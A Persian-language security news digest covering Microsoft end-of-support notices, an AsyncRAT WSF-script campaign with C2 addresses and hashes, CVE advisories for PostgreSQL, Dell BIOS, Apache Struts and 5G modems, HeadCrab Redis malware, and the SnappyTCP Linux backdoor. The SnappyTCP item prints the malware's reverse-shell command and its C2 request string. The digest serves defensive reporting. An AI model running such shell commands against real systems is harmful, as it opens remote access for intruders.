مایکروسافت اعلام کرده است که از تاریخ ۲۹ فوریه ۲۰۲۴ (۱۰ اسفند ۱۴۰۲)، پشتیبانی از برخی از محصولات و خدمات خود را متوقف می‌کند. این محصولات و خدمات شامل نسخه‌های مختلفی از ویندوز، آژور، ویژوال استودیو و ... هستند. بعد از این تاریخ، هیچ به‌روزرسانی امنیتی یا غیر امنیتی، گزینه پشتیبانی رایگان یا پرداختی یا به‌روزرسانی محتوا برای این محصولات و خدمات وجود نخواهد داشت.

مایکروسافت در این‌خصوص توصیه می‌کند که کاربران، این محصولات و خدمات خود را به نسخه‌های جدیدتر و پشتیبانی شده ارتقاء دهند. این کار به افزایش امنیت، کارایی و قابلیت اطمینان محصولات، خدمات و سیستم‌های کاربران کمک می‌کند. همچنین، مایکروسافت اطلاعات و راهنمایی‌های لازم برای ارتقاء محصولات را در وب‌سایت خود منتشر کرده است.

در لیست منتشر شده توسط مایکروسافت معروف به EoS (End of Support) برخی از محصولات و خدمات مهمی که در سال ۲۰۲۴ پشتیبانی آن‌ها پایان می‌یابد عبارتند از:

برای مشاهده لیست کامل محصولات و خدماتی که در سال ۲۰۲۴ پشتیبانی آن‌ها پایان می‌یابد، می‌توانید به لینک قرار داده شده در منبع، مراجعه کنید.
 

منبع خبر:
 

https://learn.microsoft.com/en-us/lifecycle/end-of-support/end-of-support-2024

بدافزار AsyncRAT از طریق فایل‌های اسکریپت WSF توزیع شده است. یک تیم تجزیه و تحلیل امنیتی پیش‌تر درباره توزیع AsyncRAT از طریق فایل‌ها با پسوند .chm اطلاعاتی را ارائه داده بود. اخیراً مشخص شده است که نسخه‌ای از بدافزار AsyncRAT اکنون به صورت فایل اسکریپت WSF منتشر شده است. فایل WSF  از طریق  URLهای موجود در ایمیل‌ها به صورت یک فایل فشرده با پسوند .zip توزیع شده است. پس از خارج کردن اولین فایل از حالت Zip، یک فایل با پسوند .wsf بدست می‌آید.  این فایل در اکثر قسمت‌ها شامل توضیحات است که در شکل زیر نشان داده شده است و تنها یک تگ <script> در وسط قرار گرفته است. در ادامه نمونه‌ای از آدرس‌های دانلود این بدافزار آمده است:

1.    https://*****************.com.br/Pay5baea1WP7.zip
2.    https://************.za.com/Order_ed333c91f0fd.zip
3.    https://*************.com/PAY37846wp.zip
4.    https://*****.****.co/eBills37890913.zip

لینک دانلود در اسکریپت  WSF

وقتی این اسکریپت اجرا می‌شود، یک اسکریپت Visual Basic مطابق شکل زیر از سرور کنتر  و فرمان (C2) دانلود و اجرا می‌شود. این اسکریپت یک فایل با پسوند .jpg (یک فایل Zip در قالب jpg) را از همان آدرس C2  دانلود می‌کند.  در داخل فایل، یک رشته دستوری برای اجرای محتوای فایل به نام Error.vbs وجود دارد. این رشته دستوری سپس به یک فایل XML (C:\Users\Public\temp.xml) تبدیل می‌شود. در نهایت، این اسکریپت از PowerShell  برای اجرای فایل XML استفاده می‌کند.
 

اسکریپت دانلود شده  (c.txt)

فایل فشرده‌ای که دانلود شده است شامل بسیاری از اسکریپت‌های دیگر به غیر از فایل Error.vbs است.

اسکریپت‌های دیگر به غیر از فایل Error.vbs 

درنهایت فایل‌های باقی‌مانده (bat، (ps1 به ترتیب اجرا می‌شوند. نقش و جریان اجرای هر فایل به شرح زیر است:
•    Error.vbs:
o    بررسی مجوزهای مدیریتی (Administrator) و اجرای فایل  Error.bat
•    Error.bat:
o    دور زدن کنترل حساب کاربری (UAC) و اجرای فایل  Error.ps1
•    Error.ps1:
o    ایجاد فایل میانبر با نام  C:\Users\Public\Chrome.lnk
o    ثبت و اجرا خودکار
o    اجرای فایل میانبر
•    pwng.bat:
o    دور زدن کنترل حساب کاربری (UAC) و اجرای فایل pwng.ps1
•    pwng.ps1:
o    حمله، بدون بدون نیاز به ذخیره فایل (Fileless Attack) 
 

نمودار جریان حمله

در مرحله نهایی، فایل pwng.ps1 اجرا می‌شود، رشته‌های متنی موجود در آن را به یک باینری با فرمت .Net تبدیل می‌کند. سپس این باینری را بارگیری و اجرا می‌کند. برای این کار، از یک فرآیند معتبر به نام aspnet_compiler.exe استفاده می‌شود.
 

اسکریپت PowerShell که یک حمله بدون فایل را راه اندازی می‌کند  (pwng.ps1)

در نهایت که بدافزار اجرا می‌شود به عنوان AsyncRAT شناخته خواهد شد که دارای قابلیت انسداد اطلاعات و Back door است. رفتارهای کلیدی آن به شرح زیر است:
1.    حفظ پایداری
•    استفاده از schtasks جهت افزودن یک کار زمان‌بندی شده
•    افزودن یک کلید به رجیستر
•    ایجاد یک فایل bat که خود را اجرا و یا خاتمه می‌دهد.
 

کد جهت حفظ پایداری

2.    جمع‌آوری اطلاعات
•    اطلاعات کامپیوتر: نسخه سیستم‌عامل، کاربران، لیست محصولات ضد بدافزار و غیره.
•    اطلاعات کاربر در مرورگرهای Chrome، Brave-Browser، Edge
•    اطلاعات کیف پول رمزارز
 

کد جمع‌آوری اطلاعات سیستم 

این اطلاعات به صورت یک رشته رمزگذاری شده در داخل فایل قرار دارد و به سرور C2 ارسال می‌شود. مهاجم 
با استفاده از اطلاعات بدست آمده، تلاش‌های اتصال متعددی انجام می‌دهد. این اطلاعات به خوبی نشان می‌دهند که یک تهدید جدید به نام AsyncRAT در حال منتشر شدن است. این تهدید از روش‌های پیچیده‌ای برای انتشار استفاده می‌کند و بدون نیاز به استفاده از فایل‌های اجرایی (EXE) عمل می‌کند. این تهدید اقدامات کلیدی زیر را انجام می‌دهد:

شاخص‌های حمله:

• تشخیص فایل:

•    Downloader/Script.Agent (2023.11.29.02)
•    Trojan/VBS.RUNNER.SC194987 (2023.11.30.04)
•    Trojan/BAT.RUNNER.SC194988 (2023.11.30.04)
•    Trojan/BAT.RUNNER.SC194985 (2023.11.30.04)
•    Trojan/PowerShell.Runner.SC194986 (2023.11.30.04)
•    Trojan/PowerShell.Generic.SC194981 (2023.11.30.04)
•    Trojan/PowerShell.Generic.SC194982 (2023.11.30.04)
•    Trojan/Win.Injector (2023.11.30.04)
•    Backdoor/Win.AsyncRAT (2022.07.12.00)

• مشخصات IoC (MD5):

•    750dc2354b0454eafd66900687a0f7d6 (myfax_nov272023.wsf)
•    790562cefbb2c6b9d890b6d2b4adc548 (Error.vbs)
•    a31191ca8fe50b0a70eb48b82c4d6f39 (Error.bat)
•    0a80a592d407a2a8b8b318286dc30769 (Error.ps1)
•    61b7507a6814e81cda6b57850f9f31da (pwng.bat)
•    ac12d457d3ee177af8824cdc1de47f2a (pwng.ps1)
•    c09266666ee71ade24e0e5f889cc8199
•    b98e76816350a6a527fc311dae62b85e

• سرورC2 

•    hxxp://185.81.157[.]242:222/c.txt
•    hxxp://185.81.157[.]242:222/x.jpg
•    drippmedsot.mywire[.]org:6606
•    drippmedsot.mywire[.]org:7707
•    drippmedsot.mywire[.]org:8808
 

توصیه‌های امنیتی
یک مهاجم با استفاده از روش‌های پیچیده و بدون نیاز به فایل، بدافزار را منتشر می‌کند. کاربران باید همیشه هنگام باز کردن فایل‌ها یا لینک‌های خارجی که در ایمیل‌ها قرار دارند محتاط باشند و از ویژگی‌های نظارتی در محصولات امنیتی استفاده کنند تا دسترسی مهاجمان را شناسایی و محدود کنند.

منبع خبر:

https://asec.ahnlab.com/en/59573

یک آسیب‌پذیری با شناسه‌ CVE-2023-5869 و شدت بالا 8.8 در PostgreSQL شناسایی شده است که به دلیل سرریز اعداد صحیح در آرایه  SQL امکان اجرای کد دلخواه را برای مهاجم احراز هویت شده در پایگاه‌داده فراهم می‌آورد و مهاجم می‌تواند بایت‌های دلخواه را در حافظه بنویسد و حافظه سرور را بخواند. این آسیب‌پذیری به‌دلیل سرریز اعداد صحیح در آرایه رخ می‌دهد و مهاجم از راه دور می‌تواند با داده‌های ساختگی خاص، سرریز را آغاز کند.

محصولات تحت تأثیر
این آسیب‌پذیریPostgreSQL  نسخه‌های 11، 12، 13، 14، 15 و 16 را تحت تأثیر خود قرار می‌دهد. 

توصیه‌های امنیتی
توصیه می‌شود کاربران در اسرع وقت نسبت به ارتقاء PostgreSQL به نسخه‌های 11.22، 12.17، 13.13، 14.10، 15.5 یا 16.1 اقدام نمایند.

منابع خبر:

[1] https://www.postgresql.org/support/security/CVE-2023-5869
[2] https://vuldb.com/?id.244948

مایکروسافت طی بیانیه اخیر خود اعلام کرد که نوعی خطا در عملکرد خدمات Outlook برای کاربران Microsoft 365، موجب ارسال نامه الکترونیکی حاوی تعداد کثیری پوشه به گیرنده ‌شده است. هنگامی که کاربر قصد استفاده از Outlook  برای ارسال نامه الکترونیک در رابط کاربری خود را دارد، خطایی مبتنی بر “خطا در ارسال “(NDR) با کد “0x80040305” دریافت می‌کند. مایکروسافت به کاربرانی که تحت تاثیر این نقص قرار گرفته‌اند اعلام کرده است که در نظرداشته باشند که نامه‌های الکترونیک آن‌ها به گیرندگان نرسیده است و توصیه می‌شود نامه‌ الکترونیک خود را مجددا ارسال کنند.
طبق بیانیه محققین درباره این موضوع، خطایی مشابه،‌ در سال 2019 برای Outlook رخ داد و در پی آن نامه الکترونیکی ارسالی کاربران را با بیش از 500 پوشه برای گیرندگان ارسال می‌کرد، تکرار این موضوع نشان دهنده این است که مایکروسافت اعتنایی به برطرف سازی این خطا‌ به طور کامل نداشته است.
طی هفته اخیر مایکروسافت خطایی که موجب از کارافتادن Outlook در هنگام اجرا می‌شد، برطرف ساخت.

توصیه‌های امنیتی

•  تا برطرف سازی کامل خطا، از سرویس outlook به صورت آنلاین، استفاده نشود.
•  برای عملکرد بهتر، Outlook را مجددا راه‌اندازی کنید.

منبع خبر:

https://www.bleepingcomputer.com/news/microsoft/microsoft-outlook-email-sending-issues-for-users-wi…

به تازگی محققان امنیتی، موفق به کشف یک آسیب‌پذیری به شناسه CVE-2023-32460 در نرم‌افزار BIOS سرورهای PowerEdge شرکت DELL شده‌اند. این آسیب‌پذیری به یک مهاجم احرازهویت نشده اجازه می‌دهد تا بتواند با بهره‌برداری از آن، سطح دسترسی خود بر روی سیستم آسیب‌پذیر بالا ببرد (privilege escalation). برای بهره‌‌‌‌برداری از این آسیب‌پذیری، مهاجم باید به سیستم دسترسی محلی (local) داشته باشد. دلیل به وجود آمدن این نقص امنیتی آن است که مهاجم اجازه دارد بدون پشت سر گذاشتن فرآیند احرازهویت، اقدام به اعمال تغییراتی در قابلیت‌های از BIOS کند؛ در حالیکه مجوز اعمال این تغییرات باید بعد از احرازهویت کاربر و بررسی سطح دسترسی آن کاربر امکان پذیر باشد. لازم به ذکر است که فرآیند بهره‌‌‌‌برداری از این آسیب‌پذیری هنوز توسط تیم امنیتی شرکت DELL در اختیار عموم قرار نگرفته است؛ در نتیجه اطلاعاتی در خصوص اینکه اعمال تغییرات در کدام قابلیت BIOS منجر به رخ دادن این آسیب‌پذیری می‌شود در دسترس نمی‌باشد.
 

محصولات تحت تأثیر
در جدول زیر لیست تمام محصولات شرکت DELL و نسخه‌های تحت تأثیر و وصله‌شده این آسیب‌پذیری آورده شده است. 

توصیه‌های امنیتی
به گفته محققان امنیتی شرکت DELL، لیست ارائه شده نهایی نمی‌باشد و کاربران محصولات این شرکت لازم است تا نهایی شدن این لیست جهت اطلاع از آخرین محصولات تحت تأثیر این آسیب‌پذیری و وصله‌های امنیتی منتشر شده اطلاعیه‌ها را پیگیری کنند.

منابع خبر:

[1] https://nvd.nist.gov/vuln/detail/CVE-2023-32460
[2] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32460
[3]https://www.dell.com/support/kbdoc/en-us/000219550/dsa-2023-361-security-update-for-dell-poweredge-…

اخیرأ مجموعه‌ای از حملات شناسایی شده‌اند که دامنه‌های Microsoft Active Directory را مورد هدف قرار می‌دهند. این حملات می‌تواند مهاجمان را قادر سازد تا سوابق DNS را دستکاری، Active Directory  را به خطر اندازد و دسترسی به اطلاعات حساس ذخیره شده در آن را فراهم سازد. این آسیب‌پذیری‌ها با استفاده از پیکربندی پیش‌فرض سرورهای Microsoft Dynamic Host Configuration Protocol (DHCP) قابل بهره‌برداری هستند. در حال حاضر، هیچ برنامه‌ای از سوی مایکروسافت جهت رفع این نقص امنیتی وجود ندارد. همچنین، محققان هیچ حمله فعالی را با استفاده از این آسیب‌پذیری‌ها مشاهده نکرده‌اند، آن‌ها تأکید می‌کنند که تعداد قابل توجهی از سازمان‌ها ممکن است در معرض خطر باشند.
وقتی سرور DHCP یک رکورد DNS را برای مشتریان ثبت می‌کند یا تغییر می‌دهد، از DNS Dynamic Updates  برای این کار استفاده می‌کند. به عبارت دیگر،DHCP DNS Dynamic Updates  بدون نیاز به احرازهویت توسط مشتری، فعال شده و سرورهای DHCP این ویژگی را به صورت پیش‌فرض فعال می‌کنند. مهاجم می‌تواند از سرور DHCP جهت اعتبارسنجی در سرور DNS به نفع خودش استفاده کند. به عبارت دیگر، مهاجم می‌تواند بدون نیاز به احراز هویت، دسترسی بهADIDNS  را به‌دست آورد.

توصیه‌های امنیتی
جهت جلوگیری از مخاطرات احتمالی این آسیب‌پذیری، رعایت نکات زیر حائز اهمیت می‌باشد:

• غیرفعال کردن قابلیت DHCP DNS Dynamic Updates در سرور DHCP، جهت محدود کردن حملات احتمالی.
• عدم استفاده از DNSUpdateProxy و غیرفعال کردن این ویژگی به طور دائم.

منبع خبر:

https://www.theregister.com/2023/12/07/attacks_abuse_microsoft_dhcp/

نسخه جدید بدافزار HeadCrab امکان دسترسی root به سرورهای Redis (Open Source) را فراهم می‌‌‌‌کند. نوع اول این بدافزار، 1200 سرور و نوع جدید آن، 1100 سرور را آلوده کرده است. بدافزار HeadCrab دستگاه‌های آلوده را برای استفاده در cryptomining و حملات دیگر به یک بات نت اضافه می‌‌‌‌کند.  نسخه ابتدایی بدافزار HeadCrab یک روت‌‌‌‌کیت نیست، اما در نسخه جدید، توانایی کنترل و ارسال پاسخ به بدافزار اضافه شده است و به این ترتیب به یک روت‌‌‌‌کیت کامل بدل گشته است. روت‌‌‌‌کیت بدافزاری است که دسترسی ریشه دارد و همه چیز را کنترل می‌کند. به این ترتیب می‌‌‌‌توان آنچه را که کاربر می‌بیند، کنترل نمود.
نوع جدید بدافزار HeadCrab به مهاجم اجازه می‌دهد با حذف دستورات سفارشی و افزودن رمزگذاری به زیرساخت سرور کنترل و فرمان، اقدامات خود را پنهان کند. یکی از عناصر منحصر به فرد HeadCrab یک mini blog است که نویسنده بدافزار، جزئیات فنی بدافزار و یک آدرس ایمیل Proton Mail را جهت ناشناس ماندن در آن نوشته است. محققان Aqua Security از این ایمیل برای تماس با سازنده HeadCrab - با نام رمز Ice9 - استفاده کردند، اما نتوانستند نام یا مکان او را تعیین کنند. با این حال، Ice9 به محققان گفت که آن‌ها اولین افرادی بودند که به او ایمیل زدند. در مکالمات ایمیلی با محققان، Ice9 اذعان داشتند که این بدافزار عملکرد سرور را کاهش نمی‌‌‌‌دهد و می‌‌‌‌تواند سایر بدافزارها را حذف کند. او همچنین یک هش از بدافزار را برای محققان ارسال کرد تا بتوانند آن را بررسی کنند.

محصولات تحت تاثیر
براساس تحقیقات انجام شده، HeadCrab بر آلوده‌‌‌‌سازی سرورهای Redis تمرکز دارد. هنگامی که مهاجم از دستور SLAVEOF استفاده می‌‌‌‌کند، یک ماژول مخرب دانلود شده و دو فایل جدید اجرا می‌‌‌‌شود: یک cryptominer و یک فایل پیکربندی. سپس HeadCrab سرور Redis را آلوده می‌‌‌‌کند. به گفته محققان، این فرآیند شامل دستوری است که به مدیران اجازه می‌دهد تا یک سرور را در یک کلاستر Redis به عنوان salve برای یک سرور master دیگر در خوشه تعیین کنند. پس از آلوده شدن سرور، Ice9 کنترل کامل زیرساخت سرور را در دست دارد. نسخه جدید با توانمندی‌‌‌‌های روت‌‌‌‌کیت، امکان مخفی کردن فعالیت‌های مهاجم و بهبود فرایند رمزنگاری را فراهم می‌‌‌‌کند.

توصیه‌های امنیتی
محققان توصیه کردند که سازمان‌ها، آسیب‌پذیری‌ها و پیکربندی‌های نادرست را در سرورهای خود اسکن کنند و از حالت محافظت شده در Redis استفاده کنند تا احتمال مخاطرات HeadCrab را کاهش دهند.

منابع خبر:

[1]https://www.darkreading.com/cyberattacks-data-breaches/headcrab-malware-variants-commandeer-thousan…
[2]https://hackdojo.io/articles/E59PQMNKQ/-headcrab-malware-variants-commandeer-thousands-of-servers

Apache Struts به‌روزرسانی‌های جدیدی را برای framework برنامه کاربردی وب (Open source) خود منتشر کرده است. این به‌روزرسانی‌ها، آسیب‌پذیری بحرانی (CVE-2023-50164) را بررسی می‌کنند که در صورت بهره‌برداری، می‌تواند منجر به اجرای کد از راه دور شود. Apache Struts 2 به عنوان یک framework جاوا مدرن و Open source مورد استفاده قرار گرفته و یک پلتفرم قوی جهت توسعه برنامه‌های کاربردی وب، متناسب با سطح سازمانی ارائه می‌دهد.
آسیب‌پذیری امنیتی شناسایی‌شده با شناسه CVE-2023-50164 این پتانسیل را دارد که مهاجم را قادر سازد پارامترهای مرتبط با آپلود فایل‌ها را دستکاری کند و در نتیجه پیمایش مسیر را تسهیل بخشد. در شرایط خاص، این دستکاری می‌تواند مهاجم را قادر سازد تا یک فایل مخرب را آپلود و کد دلخواه خود را از راه دور بر روی سیستم آسیب‌دیده اجرا کند. 

محصولات تحت تأثیر
این آسیب‌پذیری Apache Struts نسخه های 2.0.0 تا 2.5.32 و 6.0.0 تا 6.3.0.1 را تحت تأثیر قرار می‌دهد.

توصیه‌های امنیتی
 به کاربران توصیه می‌شود در اسرع وقت Apache Struts را به نسخه‌های Apache Struts 2.5.33 و 6.3.0.2 ارتقاء دهند.

منبع خبر:

https://www.helpnetsecurity.com/2023/12/08/cve-2023-50164/&nbsp;

مجموعه‌ای از آسیب‌پذیری‌هایی که اخیراً بر مودم‌های 5G که توسط کوالکام و مدیاتک توسعه یافته‌اند، شناسایی شده‌اند که به آن «5Ghoul» می‌گویند، در مجموع 710 مدل گوشی هوشمند 5G وابسته به شرکت‌های Google (اندروید) و اپل وجود دارد که علاوه بر این، روترها و مودم‌های USB نیز تحت تأثیر این آسیب‌پذیری‌ها قرار دارند.
حملات 5Ghoul طیفی از تأثیرات را در پی داشته است که از وقفه‌های گذرا در سرویس تا کاهش قابل توجه‌ در عملکرد شبکه را شامل می‌شود. طبق گفته محققان، مهاجم با شبیه‌سازی یک ایستگاه اصلی 5G می‌تواند به راحتی از این نقاط ضعف به صورت بی‌سیم بهره‌برداری کند. این امر حتی در شرایطی که مهاجمان جزئیاتی از سیم کارت هدف در اختیار ندارند صادق است، زیرا حمله قبل از مرحله احراز هویت شبکه (NAS) صورت می‌گیرد. برای انجام یک حمله، مهاجم فقط باید با استفاده از پارامترهای اتصال برج سلولی شناخته شده مانند SSB ARFCN، کد منطقه ردیابی، شناسه سلول فیزیکی، و نقطه A فرکانس، gNB معتبر را جعل کند.
 
 

شمای کلی از حمله 5Ghoul

ده آسیب‌پذیری 5Ghoul که تا 7 دسامبر 2023 به طور عمومی برای کوالکام و مدیاتک افشا شده‌اند، عبارتند از:
•    CVE-2023-33043: یک نقص را در مودم‌های Qualcomm X55/X60 نشان می‌دهد که در آن دریافت یک PDU MAC/RLC نامعتبر می‌تواند منجر به انجام حمله منع سرویس (DoS) شود. مهاجمان، با استفاده از یک gNB در معرض خطر، می‌توانند یک فریم MAC downlink معیوب را به تجهیزات کاربر 5G (UE) ارسال کنند که منجر به توقف کوتاه سیستم و راه‌اندازی مجدد مودم می‌شود.
•    CVE-2023-33044 و CVE-2023-33042 : این آسیب‌پذیری نیز  منجر به انجام حمله منع سرویس (DoS) در مودم‌های Qualcomm X55/X60 خواهد شد و مهاجم می‌تواند یک NAS PDU ناقص را به تجهیزات کاربر (UE) ارسال کند که منجر به خرابی مودم و راه‌اندازی مجدد آن می شود. در آسیب‌پذیری با شناسه CVE-2023-33042 مهاجم می‌تواند یک قاب RRC ناقص را در طول پروسه پیوست RRC ارسال کند، اتصال 5G را غیرفعال کند.
•    CVE-2023-32842: تنظیم RRC نامعتبر spCellConfig باعث انجام حمله DoS در مودم‌های MediaTek Dimensity 900/1200 می‌شود. این آسیب‌پذیری به دلیل راه‌اندازی اتصال RRC نادرست است که منجر به خرابی مودم و راه‌اندازی مجدد دستگاه‌های آسیب‌دیده می‌شود.
•    CVE-2023-32844 : این شناسه در واقع یک آسیب‌پذیری در مودم‌های MediaTek Dimensity 900/1200 مربوط به RRC (Radio Resource Control) نامعتبر PUCCH (Physical Uplink Control Channel) CSIReportConfig می‌باشد و به مهاجم امکان انجام حمله منع سرویس را می‌دهد.
•    CVE-2023-20702: آسیب‌پذیری در مودم‌های MediaTek Dimensity 900/1200 که امکان حمله DoS را از طریق یک توالی داده RLC  نامعتبر فراهم خواهد کرد. 
•    CVE-2023-32846: پیکربندی فیزیکی CellGroup RRC کوتاه شده که منجر به حمله DoS در مودم‌های مدیاتک Dimensity 900/1200 می‌شود. تنظیم ناقص اتصال RRC می‌تواند منجر به خرابی مودم شود.
•    CVE-2023-32841: جستجوی RRC نامعتبر SpacesToAddModList باعث حمله DoS در مودم‌های MediaTek Dimensity 900/1200 می‌شود. این نقص شامل راه‌اندازی اتصال RRC ناقص است که باعث خرابی مودم در دستگاه‌های آسیب‌دیده می‌شود.
•    CVE-2023-32843: پیکربندی نادرست Uplink RRC باعث ایجاد حمله DoS در مودم‌های MediaTek Dimensity 900/1200 می‌شود. 
•    CVE-2023-32845: پیکربندی RRC Uplink Null  منجر به انجام حمله منع سرویس (DoS) در مودم‌های MediaTek Dimensity 900/1200 می‌شود. یک تنظیم ناقص اتصال RRC با فیلدهای محموله RRC خاص که روی null تنظیم شده است، می‌تواند منجر به خرابی مودم شود.
CVE-2023-33042 نگرانی‌های قابل توجهی را در پی دارد زیرا دارای قابلیت وادار کردن دستگاه به قطع اتصال از شبکه 5G و بازگشت به اتصال 4G است. این انتقال دستگاه را در معرض آسیب‌پذیری‌های حوزه 4G قرار می‌دهد، در نتیجه طیف حملات احتمالی را که ممکن است با آن مواجه شود، افزایش می‌دهد.
 
 

حمله downgrade 5G به 4G

محصولات تحت تأثیر
برخی از محصولات آسیب‌پذیر شامل گوشی‌های POCO، Black، Lenovo، AGM، Google، TCL، Redmi، HTC، Microsoft و Gigaset هستند که لیست کامل آن در تصویر زیر آورده شده است.
 

 
توصیه‌های امنیتی
Qualcomm and MediaTek  هر دو برای این نقص امنیتی اقداماتی انجام داده‌اند و آن را در اختیار تولیدکنندگان قرار داده‌اند ولی به دلیل پیچیدگی عرضه نرم‌افزار، به‌ویژه در اندروید، مدتی طول می‌کشد تا این وصله‌های امنیتی از طریق انتشار به‌روزرسانی‌ها به دست کاربران برسد؛ اما اگر نگران نقص‌های 5Ghool هستید، عملی‌ترین رویکرد آن است که از استفاده از فناوری 5G تا زمانی که وصله‌های امنیتی آن منتشر نشود، خودداری کنید. نشانه‌های حمله 5Ghoul شامل از دست دادن اتصالات 5G، عدم توانایی در اتصال مجدد تا زمانی که دستگاه راه‌اندازی مجدد نشود و افت مداوم به 4G با وجود در دسترس بودن شبکه 5G در منطقه است.

منبع خبر:

https://www.bleepingcomputer.com/news/security/new-5ghoul-attack-impacts-5g-phones-with-qualcomm-me…;

مهاجمان با بهره‌برداری از “TCP” معکوس، در سیستم‌عامل‌های لینوکس و یونیکس را دچار مخاطره خواهند کرد. این بهره‌برداری به آن‌ها اجازه می‌دهد تا بدون افشاء هویت و موقعیت مکانی‌شان، دستورات و اطلاعات مد نظر خود را اجرا و داده‌ها را سرقت نمایند و امنیت سیتم‌عامل را به خطر می‌اندازند. آن‌ها با بهره‌برداری از آسیب‌پذیری با شناسه‌های CVE-2021-44228، CVE-2021-21974 وCVE-2022-0847 به سیستم‌عامل هدف دسترسی پیدا کرده، سپس با اجرای “upxa.sh” شبکه سیستم‌عامل هدف را به سرور‌هایی که تحت کنترل دارند متصل می‌کنند.
 

جزئیات فایل “upxa.sh”.

 “TCP” با دارا بودن ویژگی‌های اولیه “C2” و شبکه Persistence، نوعی “Webshell” است که مهاجمان با ادغام آن با دو آسیب‌پذیری دیگر، امنیت ارتباط “OpenSSL” سرورخودشان را با شبکه کاربر به وسیله پروتکل “TLS” تأمین کرده و دیگری نیز با استخراج “IP” از 256 بایت اولیه فایل “conf”، هدف را به سرور متصل می‌کند. پس از ایجاد اتصال، بدافزار جستجو برای “X-Auth-43245-S-20” و “\r\n\r\n” در درخواست “HTTP” آغاز می‌کند. در این مرحله “TCP” معکوس شروع به کار می‌کند. بدافزار به دو روش عمل خواهد کرد :
1-    بدافزار از “OpenSSL” و پروتکل امنیتی رایج “TLS” جهت ایجاد نوعی لینک استفاده می‌کند.
2-    بد افزار به وسیله “IP” استخراج شده از فایل “conf”، به هدف متصل می‌شود و سپس دستور زیر را ارسال می‌کند:

GET /ssl.php HTTP/1.1\\r\\nHost: %s\\r\\nHostname: %s\\r\\nConnection: close\\r\\n\\r\\n

همانند نمونه‌هایی که در گذشته رخ داده‌اند، این بدافزار با ارسال نوعی “bash” یک فایل جدید با نام “update” ایجاد می‌کند:

bash -c \\”./update exec:’bash -li’,pty,stderr,setsid,sigint,sane OPENSSL:%s:%d,verify=0 2>&1>/dev/null&\\”

در این بدافزار از زنجیره ابزار “GLIBC” استفاده شده  است که توانایی آن را دارد تا عملیات خود را به صورت خودکفا و بدون نیاز به همسان‌سازی خود با کتابخانه‌های سیستم هدف انجام دهد. فایل‌هایی که دارای پسوند “ELF” هستند، دارای تاریخ Compile نیستند که همین امر کمک می‌کند تا سیر تکاملی بدافزار را پنهان کند.

توصیه‌های امنیتی
1. چک کردن فایل log.
2. اگر نشانه‌ای از تهدیدات احتمالی یافت شد، از منبع آن اطمینان حاصل شود و کارشناس مربوطه، مورد را بررسی کند.
4. در صورتی که دلایلی مستحکم مبنی بر وجود حمله یافت نشد، شاخص‌های مخرب مسدود شوند.

منبع خبر :

https://cybersecuritynews.com/snappytcp-reverse-shell